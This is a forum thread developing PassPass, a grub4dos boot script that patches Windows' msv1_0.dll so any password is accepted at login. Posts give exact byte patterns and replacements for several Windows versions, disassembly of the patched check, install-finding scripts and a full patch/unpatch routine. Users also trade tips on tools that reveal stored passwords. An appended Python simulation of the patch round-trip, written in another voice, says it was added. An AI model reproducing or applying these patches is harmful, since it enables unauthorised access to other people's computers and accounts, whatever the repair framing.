
PassPass - Bypass the Password


430 replies to this topic

#76 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 12 June 2013 - 05:19 PM

What DLL is everybody talking about?

 

Please furnish the following info.

  1. Windows version (e.g. XP, Vista, 7)
  2. Service pack (e.g. SP0, SP1)
  3. Architecture (e.g. 32-bit/64-bit)
  4. msv1_0.dll version (e.g. 6.1.7600.16525) along with MD5 checksum, if possible ( i.e. the §@ç#ing EXACT DLL version you tested)

 

Do I need to have it on my pendrive?

 

No. It is there in \WINDOWS\system32

 

Instead of WINDOWS, theoretically it can be ANY directory in the root of a drive which Windows is installed on.



#77 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 12 June 2013 - 05:47 PM

@Sherlock

The following line will prevent the boot device from being searched for Windows folders - if I boot from a large USB HDD with multiple partitions, it takes quite a while for it to search the hd0,x partitions when there is no point.

 

set /a skip = %length% + %skip% + 1  > nul
if not "%?_BOOT:~0,4%"=="%dev:~0,4%" echo Checking %dev%... && call %~pnx0 findDLL %dev%
goto :autoLoop



#78 dummkopf007

dummkopf007

    Member

  • Members
  • 85 posts
  • Location:vasodilator madness .....hydrocephalus ...........hose your mind thx ............. Dr Struck off ... .......... Bedsforhire
  •  
    United Kingdom

Posted 12 June 2013 - 06:30 PM

  hi guys a little 'off topic' used passpass on win7 32 sp1, 6.1.7601.17514 shown as worked in similar posts.

In the past I'd bootup with a live PE (XP) USB, run a 'bat file'  to rename msv1_0.dll  then copy same patched to target drive.

  After booting up into target drive I'd use a portable app to view the password, this worked for me in XP and I think also in Vista(?)

I can't retest Vista at this time.

 

Doing the same with an already acquired patched win7 msv1_0.dll on the target win7 disk, the password could not be seen; from what I remember the portable app (numerous of them) would show the pass as something like #root

 

I would like to see the password in win7 on the target disk after patching msv1_0.dll

      any help appreciated


Edited by dummkopf007, 12 June 2013 - 06:34 PM.


#79 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 12 June 2013 - 06:45 PM

  After booting up into target drive I'd use a portable app to view the password, this worked for me in XP and I think also in Vista(?)

 

What's the magical app capable of breaking NTLM hash in seconds?



#80 dummkopf007

dummkopf007

    Member

  • Members
  • 85 posts
  • Location:vasodilator madness .....hydrocephalus ...........hose your mind thx ............. Dr Struck off ... .......... Bedsforhire
  •  
    United Kingdom

Posted 12 June 2013 - 07:20 PM

OK, this one of many works in XP: google PC Wizard, download the zip file, open/run PC Wizard.exe

click configuration tab then the Keys icon



#81 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 12 June 2013 - 07:26 PM

Worked -
windows 7 64 bit SP1
version: 6.1.7601.17514
md5: 4c1e16b9a53102c8d6fba587cbcb95de


Did NOT work (patch successful but still needed correct password as if it did not do anything) -
windows 7 64 bit SP0
version: 6.1.7600.16385
md5: f40388a19f3be3cec25656ce07392877

 

Please try the latest version of the script (r11 as of now) for BOTH the installations.



#82 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 June 2013 - 08:47 PM

Nop,
only it says "No Windows Installation found".
I've tested now on 4 PCs and it's the same.

Are you sure you are using a valid grub4dos version, a valid WENV version and the original PassPass.g4b?

Try using this:

!BAT
if "%1"=="" goto :usage
if "%1"=="isadir" goto :isadir
insmod wenv > nul

set vol=%1
set sub=System32
set file=msv1_0.dll
set found=0
wenv dir %vol%/ > (md)0x3000+0x10
wenv for /f %i in ( (md)0x3000+0x10 ) do exec %0 isadir %i
if "%found%"=="0" echo Found NO Windows install on %vol%.
goto :EOF

:isadir
cat --length=0 %vol%/%2/%sub%/%file% > nul || goto :EOF
if "%found%"=="0" echo Found possible Windows install(s):
set /a found=%found%+1 > nul
echo %found%) %vol%/%2/
goto :EOF

:usage
echo /findwind.g4b
echo Find a named file on hard disk
echo in a named subdirectory of an unknown directory in root
echo this example attempts to find a Window install by looking for
echo file msv1_0.dll in ROOT\*whatever*\System32\
echo -----------------------------------------------------------
echo Usage:
echo /findwind.g4b (hd0,0)
echo to check first partition on first disk
echo /findwind.g4b (hd0,1)
echo to check second partition on first disk
echo /findwind.g4b (hd1,0)
echo to check first partition on second disk
echo NO checks for validity of supplied parameter!!!

 

Run for the various disk volumes.

 

To check the  disk volumes available run on command line:

find --devices=h

 

:cheers:

Wonko

 



#83 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 June 2013 - 09:07 PM

OK, this one of many works in XP: google PC Wizard, download the zip file, open/run PC Wizard.exe

click configuration tab then the Keys icon

 

Besides being totally off topic, it does NOT work in XP (in the sense that it does NOT provide the login password of any NT SAM account).

It does provide a number of other passwords, listed on the homesite:

http://www.cpuid.com.../pc-wizard.html

 

Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup ...)

 

I would guess that your memory is not as good as it should be, I never heard of any software capable of retrieving a NT login password "instantly", there are tools that may be able to, but after long hours of computing (unless you have a very large rainbow table and a very fast system):

http://en.wikibooks....ws_XP_Passwords

 

Please remember that one thing is to access the system, another one is to change or reset a password for a given account and yet another one to recover or retrieve the original password of an account.

 

If you happen to find such a software (capable of recovering or retrieving the original password of an account in a small amount of time), let us know.

 

:cheers:

Wonko



#84 dummkopf007

dummkopf007

    Member

  • Members
  • 85 posts
  • Location:vasodilator madness .....hydrocephalus ...........hose your mind thx ............. Dr Struck off ... .......... Bedsforhire
  •  
    United Kingdom

Posted 12 June 2013 - 09:36 PM

hi Wonko  Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup +......................)

I suggest you try it, just letting you know it works on XP

anyone else tried it apart from reading some of the guff...............................?

 

it does provide the login password   .................... so does Spotmau


Edited by dummkopf007, 12 June 2013 - 09:42 PM.


#85 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 June 2013 - 09:48 PM

hi Wonko  Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup +......................)

I suggest you try it, just letting you know it works on XP

anyone else tried it apart from reading some of the guff...............................?

 

it does provide the login password   .................... so does Spotmau

Good :), it doesn't work on my XP, then :(.

 

I presume that it should be in Configuration -> Passwords.

 

Maybe you could start a new thread listing the apps that work for your login password, so that other people can test them and report (and provide their own preferred tools).

 

The only thing that you can be sure about is that unless an entirely new approach to decoding NTLM hashes comes out, PassPass or any grub4dos based script won't be able to provide that kind of info.

 

:cheers:

Wonko



#86 maximus57

maximus57

    Newbie

  • Members
  • 29 posts
  •  
    United States

Posted 12 June 2013 - 10:00 PM

Please try the latest version of the script (r11 as of now) for BOTH the installations.

 

In short I must report success with r11 on both installations. That fixed it.

:good:

 

This tool could definitely help me out someday, as I do computer repair on the side for friends. That sometimes leads to friends of friends of friends, which makes it hard to get their password from them in a timely manner (especially later on at night). It is much nicer to be able to give their computer back to them with the password still there, as opposed to having to reset it (or wait for a few days to get it from them). I have used KONBOOT in the past, but had to make sure it was the first thing to boot every time.


Edited by maximus57, 12 June 2013 - 10:13 PM.


#87 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 12 June 2013 - 10:20 PM

For Release Preview 32-bit, this works

cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll


#88 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 12 June 2013 - 10:58 PM

@sherlock and WKS

 

The cat code in PassPass.g4b seems overly complex in that it seems to be testing to see if the dll is 32 bit or 64-bit and then a fairly short byte sequence which could lead to problems.

 

why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?

 

e.g.

 

set n=0

cat --locate=abcdefghijkl --replace=abcdefgZZZkl (hdx,y)/windows/system32/msv1_0.dll && set n=1

cat --locate=opqrstuvwx --replace=opqrstuVWx (hdx,y)/windows/system32/msv1_0.dll && set n=1

..add more here for win8 sequences or different versions

if "%n%"=="1" echo Patch worked || echo Patch did not work

 

and similar for unpatch.



#89 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 12 June 2013 - 11:40 PM

why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?

Because the essence is of NOT having a unique sequence, but instead a "wide" (or as wide as possible) one.

The single three bytes patch for 32 bit systems should work for 2k to Windows 7 (and this is the actual genius of Damian :thumbsup:). 

 

Otherwise you will need a "unique" sequence for each and every version of the .dll, a nightmare, given the number of versions that are (or that will be) around (this may or may not - have never checked - comprise "localized" versions).

 

That is "plan" B (and explains maybe why some code has been made to detect the exact .dll version and why this piece of info is asked of testers).

 

The patch you posted (without specifying the version that it refers to, thus contributing to create confusion)  is as good as any other :), but most probably is "specific" and not "wide" :dubbio:.

 

:cheers:

Wonko



#90 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 13 June 2013 - 12:42 AM

For Release Preview 32-bit, this works

cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll

 

What instruction does it replace by what instruction? I doubt that this patch is too specific (it may not be the case) rather than being a generic one. This also addresses your query:

 

@sherlock and WKS

 

The cat code in PassPass.g4b seems overly complex in that it seems to be testing to see if the dll is 32 bit or 64-bit and then a fairly short byte sequence which could lead to problems.

 

why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?

 

As I have mentioned in technical details, the 32 bit patch we have used in PassPass tries to "kill" all CMP AX, 10h instructions blindly. Also it has been tested on various versions of DLL to ensure that this operation does not have any visible side effect.

 

For 64-bit DLLs, life is tough. I tried to do the same and it came up with the following error during log-in "Insufficient resource...blah blah" and the log-in failed for both valid and invalid passwords. Look carefully. Here we are searching a bit longer byte sequence by taking the next two bytes into account though not actually replacing those. It narrows down the "blind" replacements as opposed to 32-bit DLLs.

 

Now, why are we not doing the same for 32-bit DLLs? Coincidentally, whatever sample DLLs we have tested so far do not have any such "unique" two bytes following the target bytes to be patched.



#91 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 13 June 2013 - 12:47 AM

I have used KONBOOT in the past, but had to make sure it was the first thing to boot every time.

 

Free version of KONBOOT does not support 64 bit Windows. Besides, I have seen KONBOOT failing many a time with an error message, "Dummy BIOS Seems to be in place, fixing SMAP BIOS entries". Success rate with PassPass should be higher, I suppose.



#92 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 13 June 2013 - 02:49 AM

if not "%?_BOOT:~0,4%"=="%dev:~0,4%" echo Checking %dev%... && call %~pnx0 findDLL %dev%

 

What does the highlighted fragment mean?



#93 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 13 June 2013 - 07:29 AM

http://www.rmprepusb...-in-batch-files



#94 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 13 June 2013 - 08:06 AM

For Release Preview 32-bit, this works

cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll

 

Win 8 Release preview 32-bit Dll Ver 6.2.8400.0  - actually also  \x4d\x3b\xc6\x75   and  \x3b\xc6\x75\x13 are unique sequences in this dll

 

50                  push eax
53                  push ebx
FF 15 00 E1 13 4D   call ds:RtlCompareMemory
3B C6               cmp eax, esi
75 13               jnz short loc_EE8C

 

re. generic replacement. If the byte sequence is too short it may affect other parts of the dll. I suppose you could test for that and warn the user:

cat --locate=\x3b\xc6\x75\x13 %file% > (md)0x9000+10
if %@retval%>=2 pause WARNING: More than one instance found in %file%!


#95 guimenez

guimenez

    Frequent Member

  • Advanced user
  • 172 posts
  •  
    Portugal

Posted 13 June 2013 - 09:04 AM

Are you sure you are using a valid grub4dos version, a valid WENV version and the original PassPass.g4b?

Try using this:

!BAT
if "%1"=="" goto :usage
if "%1"=="isadir" goto :isadir
insmod wenv > nul

set vol=%1
set sub=System32
set file=msv1_0.dll
set found=0
wenv dir %vol%/ > (md)0x3000+0x10
wenv for /f %i in ( (md)0x3000+0x10 ) do exec %0 isadir %i
if "%found%"=="0" echo Found NO Windows install on %vol%.
goto :EOF

:isadir
cat --length=0 %vol%/%2/%sub%/%file% > nul || goto :EOF
if "%found%"=="0" echo Found possible Windows install(s):
set /a found=%found%+1 > nul
echo %found%) %vol%/%2/
goto :EOF

:usage
echo /findwind.g4b
echo Find a named file on hard disk
echo in a named subdirectory of an unknown directory in root
echo this example attempts to find a Window install by looking for
echo file msv1_0.dll in ROOT\*whatever*\System32\
echo -----------------------------------------------------------
echo Usage:
echo /findwind.g4b (hd0,0)
echo to check first partition on first disk
echo /findwind.g4b (hd0,1)
echo to check second partition on first disk
echo /findwind.g4b (hd1,0)
echo to check first partition on second disk
echo NO checks for validity of supplied parameter!!!

 

Run for the various disk volumes.

 

To check the  disk volumes available run on command line:


find --devices=h

 

:cheers:

Wonko

Sorry, but I need a little more help.

Where do I put all the commands you said?

In the menu.lst?

I'm sorry, but I have never worked with those commands in grub4dos.

 

When i run the find --devices=h

this is my list

hd0,1

hd0,0

hd1,0

hd1,1

 

Thanks for your help



#96 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 13 June 2013 - 09:16 AM

re. generic replacement. If the byte sequence is too short it may affect other parts of the dll. I suppose you could test for that and warn the user:

Why? :w00t:

I mean, as I have tried to tell you, the current patch for 32 bit dll (working theoretically for anything from 2K to 7) does replace several instances.

It is designed to do that.

It does that and the result is a patched .dll that works.

 

If you prefer, WindowsGate has worked on 32 bit Windows that way for several years and it still works, without any warning (when it works).

 

Since we don't pay a fee to patch bytes and it's not like it takes ages, the only issue is philosophical, we are patching more bytes than those needed, but this allows us to cover with the same patch more versions.

 

Two possible cases when more than one instance is found (and replaced) by design:

  1. the patched dll allows access (the patch is correct :))
  2. the patched dll does not allow access (the patch is not fit for that particular version of the .dll :()

In first case the warning makes no sense since the result is working.

 

In the second case the warning may be useful IF the user could do anything about it. BUT since he/she cannot but patch the .dll and see if it provides access, it is superfluous (and it makes no sense because if it's the first case instead, the same warning will lead to a working patched dll).

 

@guimenez

Copy and paste that snippet with notepad to a new plain text file, save it as findwind.g4b and copy it to the root of the stick (or whatever) which you boot with grub4dos.

Boot the stick at the menu choices press "c" to get to command line and type:

find --devices=h

 

[ENTER]

This will give you a list of the devices (volumes on hd-like devices) that grub4dos can see.

EXAMPLE:

(hd0,0)

(hd0,1)

(hd1,0)

 

For each of those run findwind, i.e. type:
/findwind.g4b (hd0,0)

[ENTER]

etc.

 

Report.

 

:cheers:

Wonko



#97 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 13 June 2013 - 09:27 AM

@Wonko and Sherlock

 

Consider this case:

 

We have two byte sequences we are looking for, one to patch and one to unpatch. 

The patch sequence searches for abcde

The unpatch sequence searches for abXYe

 

Now consider that we have a DLL that has 20 patch sequences and 2 unpatch sequences in its normal state.

 

When we run 'patch' we replace 20 sequences with the unpatch sequence.

Some other routines in the dll may no longer work - this could have knock-on effects (like not validating logon credentials apart from the user pwd entry)

When we run 'unpatch' we restore these 20 sequences and also the 2 sequences that were never patched before.

 

We now have a corrupted DLL and the MD5 is different!

 

Now say we run the patch again - this time we patch 22 locations - 2 of which were not patched the first time we ran the patch. Now the MD5 is different again.



#98 guimenez

guimenez

    Frequent Member

  • Advanced user
  • 172 posts
  •  
    Portugal

Posted 13 June 2013 - 09:36 AM

/findwind.g4b (hd0,0)

[ENTER]

etc.

 

Report.

 

:cheers:

Wonko

 

 Many thanks Wonko!!!!

Once again you saved me :D

The problem was the wenv file, it was older :(

Now I've tested on 4 machines and it works flawlessly :D:D

 

Thanks once again



#99 Wonko the Sane

Wonko the Sane

    The Finder

  • Advanced user
  • 16066 posts
  • Location:The Outside of the Asylum (gate is closed)
  •  
    Italy

Posted 13 June 2013 - 10:02 AM

@Wonko and Sherlock

Consider this case:

No.

We don't have this case, we did not have this case, we will hopefully not have this case.

We (I put myself in the "basket" though the approach/idea is to be credited to Damian :worship:) were smart enough to check that the code that we use as patch does not exist before patching (done this manually till now, but nothing prevents adding some code to do it in the program).

This is the base trick for the 32 bit dll's. There won't be any 33C090 on any 32 bit .dll (unless the good MS guys introduce one "artificially" to make the tool cease to work).

Of course it is not - as said - philosophically correct, it is not even correct from a programmer's point of view, and it is possibly also "unfair" :ph34r:, but as long as it works it is good enough.

There is another approach (that may be good if we assume that the thingy will always be used on USB sticks or the like), i.e. "recording" the addresses of the patches made and unpatching only those addresses, but that would not be a good idea if the thing is used on CD/DVD.
(I do have a plan to solve this also, but I won't reveal it until there is actually a need for it.)

And there is the third approach (which is the "plan B" talked about before), i.e. creating a database of all possible .dll's with the "correct patches and unpatches".

This last one is the "correct" and "fair" one, but it has many limits: when a "new" .dll is found it won't work (while the "generic" approaches may).

My personal philosophy is that this "plan B" should be a "plan B" and not the "primary approach".

If you want me to say that maybe the thingy was released too early and with not enough beta-testing, you could probably manage to do that.
If you want me to say that it is maybe too risky for the average user, you could probably manage to do that.

I don't want to give the impression that this is a consolidated, verified, triple checked, fail-proof and fool-proof kind of thing BUT:
  • It is not "safe".
  • It is an experimental, extremely risky, possibly destructive program.
  • If you don't have the guts to test it, move along.
  • If you have the guts to test it but it makes your PC unbootable, DO NOT WHINE, you were told about this possibility.
  • If it works, good, if it doesn't please report and we'll see if we can make it work.

and that is essentially the reason for the note in my Careware license.

Many thanks Wonko!!!!
Once again you saved me :D
The problem was the wenv file, it was older :(
Now I've tested on 4 machines and it works flawlessly :D:D

Thanks once again

Yep, that's why it is EXPLICITLY written which version of it to use (and why I prompted you to verify the version).
Happy it worked :), if you could share the EXACT §@ç#ing pieces of info about the OS's, and bit width and .dll versions I would be even happier ;).

:cheers:
Wonko

#100 steve6375

steve6375

    Platinum Member

  • Developer
  • 7566 posts
  • Location:UK
  • Interests:computers, programming (masm,vb6,C,vbs), photography,TV,films
  •  
    United Kingdom

Posted 13 June 2013 - 12:07 PM

If you want to add this code feel free. It checks for the unpatch bytes  before patching and will refuse to run it if they exist

 

if this is experimental code, it makes sense to not trash the system or at least warn the user...

 

 

:: Patches DLL file; expects %dllPath% and %patchDrv% to be set by the caller
:: and the 32/64-bit choice already made (see :unPatchDLL below for that check)
:32BitPatch
echo 32Bit Patch bytes \x83\xF8\x10
:: Clear any answer left over from a previous run, then write the offsets of all
:: hits to memory and count the separators to get the number of instances
set ask=
cat --locate=\x83\xF8\x10 %dllPath% > (md)0x9000+10
cat --locate=\x20 (md)0x9000+10
set n1=%@retval%
if %n1%==0 goto :warnUser
if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %dllPath%! Press S to skip :
if not "%ask%"=="S" cat --hex --locate=\x83\xF8\x10 --replace=\x33\xC0\x90 %dllPath% > nul
if "%@retval%"=="0" goto :warnUser
goto :patchMessage
:64BitPatch
echo 64Bit Patch bytes \x48\x3B\xC6\x0F\x85
set ask=
cat --locate=\x48\x3B\xC6\x0F\x85 %dllPath% > (md)0x9000+10
cat --locate=\x20 (md)0x9000+10
set n1=%@retval%
if %n1%==0 goto :warnUser
if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %dllPath%! Press S to skip :
if not "%ask%"=="S" cat --hex --locate=\x48\x3B\xC6\x0F\x85 --replace=\x33\xC0\x90\x0F\x85 %dllPath% > nul
if "%@retval%"=="0" goto :warnUser
:patchMessage
echo
echo DLL at %2\%3 patched
goto :EOF
:warnUser
echo
pause The DLL is not compatible or has been already patched
configfile %patchDrv%
goto :EOF

:: Unpatches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir
:unPatchDLL
set dllPath=%2/%3%dll%
:: Check for 0x6486 to identify 64-bit PE
cat --locate=\x64\x86 %dllPath% > nul
if not "%@retval%"=="0" goto :64BitUnpatch
:32BitUnpatch
echo 32BitUnpatch
set ask=
cat --locate=\x33\xC0\x90 %dllPath% > (md)0x9000+10
cat --locate=\x20 (md)0x9000+10
if %@retval%>=2 set /p /u ask=WARNING: More than one instance found in %dllPath%! Press S to skip :
if not "%ask%"=="S" cat --hex --locate=\x33\xC0\x90 --replace=\x83\xF8\x10 %dllPath% > nul
if "%@retval%"=="0" goto :warnUserU
goto :unpatchMessage
:64BitUnpatch
echo 64BitUnpatch
set ask=
cat --locate=\x33\xC0\x90\x0F\x85 %dllPath% > (md)0x9000+10
cat --locate=\x20 (md)0x9000+10
if %@retval%>=2 set /p /u ask=WARNING: More than one instance found in %dllPath%! Press S to skip :
if not "%ask%"=="S" cat --hex --locate=\x33\xC0\x90\x0F\x85 --replace=\x48\x3B\xC6\x0F\x85 %dllPath% > nul
if "%@retval%"=="0" goto :warnUserU
:unpatchMessage
echo
echo DLL at %2\%3 unpatched
goto :EOF
:warnUserU
echo
pause The DLL is not compatible or has been already unpatched
configfile %patchDrv%
goto :EOF
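The round-trip problem steve6375 raises in #97 (a blind replace-all is not reversible when the replacement sequence already occurs in the file), Wonko's precondition in #99 (check that the patch bytes do not already exist before patching) and the refusal branch in the snippet above can be simulated in a few lines of Python. The following is an added example, not PassPass code and not written by anyone in this thread: it uses steve6375's abstract sequences abcde/abXYe in place of real DLL bytes, builds a constructed in-memory image (no file is read or written), and shows why a blind multi-site replacement corrupts the file when the replacement form pre-exists, why comparing the file's digest against a known-good value (the kind of MD5 reported in #81) is the reliable way to tell a touched file from an untouched one, and how the pre-check turns the corrupting case into a refusal. The function names and the `--` filler between sites are assumptions made for the example.

```python
import hashlib

# Abstract stand-ins from steve6375's scenario in #97 (assumption: not real DLL bytes).
PATCH_LOCATE = b"abcde"   # what "patch" searches for
PATCH_REPLACE = b"abXYe"  # what "patch" writes and "unpatch" searches for


def build_sample_image(patch_sites: int = 20, preexisting: int = 2) -> bytes:
    """Constructed in-memory image: `patch_sites` occurrences of the patch target plus
    `preexisting` runs that already look like the patched form, separated by filler."""
    blocks = [PATCH_LOCATE] * patch_sites + [PATCH_REPLACE] * preexisting
    return b"--".join(blocks) + b"--"


def count_sites(image: bytes, seq: bytes) -> int:
    """Non-overlapping occurrence count, i.e. the number of hits a locate would report."""
    return image.count(seq)


def blind_patch(image: bytes, locate: bytes, replace: bytes) -> tuple[bytes, int]:
    """Replace every occurrence, the way a locate/replace over the whole file does.
    Returns the new image and the number of sites touched."""
    return image.replace(locate, replace), image.count(locate)


def round_trip(image: bytes) -> dict:
    """Patch then unpatch blindly and report whether the original came back."""
    patched, n_patch = blind_patch(image, PATCH_LOCATE, PATCH_REPLACE)
    restored, n_unpatch = blind_patch(patched, PATCH_REPLACE, PATCH_LOCATE)
    return {
        "patched": n_patch,
        "unpatched": n_unpatch,
        "restored_equals_original": restored == image,
        "md5_original": hashlib.md5(image).hexdigest(),
        "md5_restored": hashlib.md5(restored).hexdigest(),
    }


class AlreadyPatched(Exception):
    """Raised when the replacement bytes are already present (Wonko's precondition)."""


def checked_patch(image: bytes, locate: bytes, replace: bytes) -> tuple[bytes, int]:
    """Patch only if the image contains no copy of the replacement sequence and at
    least one copy of the target; otherwise refuse, like the :warnUser branch above."""
    if image.count(replace):
        raise AlreadyPatched("replacement sequence already present; refusing to patch")
    hits = image.count(locate)
    if hits == 0:
        raise ValueError("target sequence not found; image not compatible")
    return image.replace(locate, replace), hits


def verify_md5(image: bytes, expected_md5: str) -> bool:
    """Integrity check against a known-good digest; a mismatch is the reliable
    sign that the file has been touched, whatever the byte sequences say."""
    return hashlib.md5(image).hexdigest() == expected_md5


if __name__ == "__main__":
    img = build_sample_image()
    print("patch sites:", count_sites(img, PATCH_LOCATE),
          "pre-existing patched form:", count_sites(img, PATCH_REPLACE))
    print(round_trip(img))
    try:
        checked_patch(img, PATCH_LOCATE, PATCH_REPLACE)
    except AlreadyPatched as exc:
        print("refused:", exc)
```

With the default 20 + 2 image the round trip reports 20 sites patched but 22 unpatched, so the "restored" image differs from the original and its digest no longer matches; with no pre-existing copies of the patched form the round trip is exact. `checked_patch` refuses the first image and accepts the second, which is the behaviour the snippet above adds to the patch routine.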
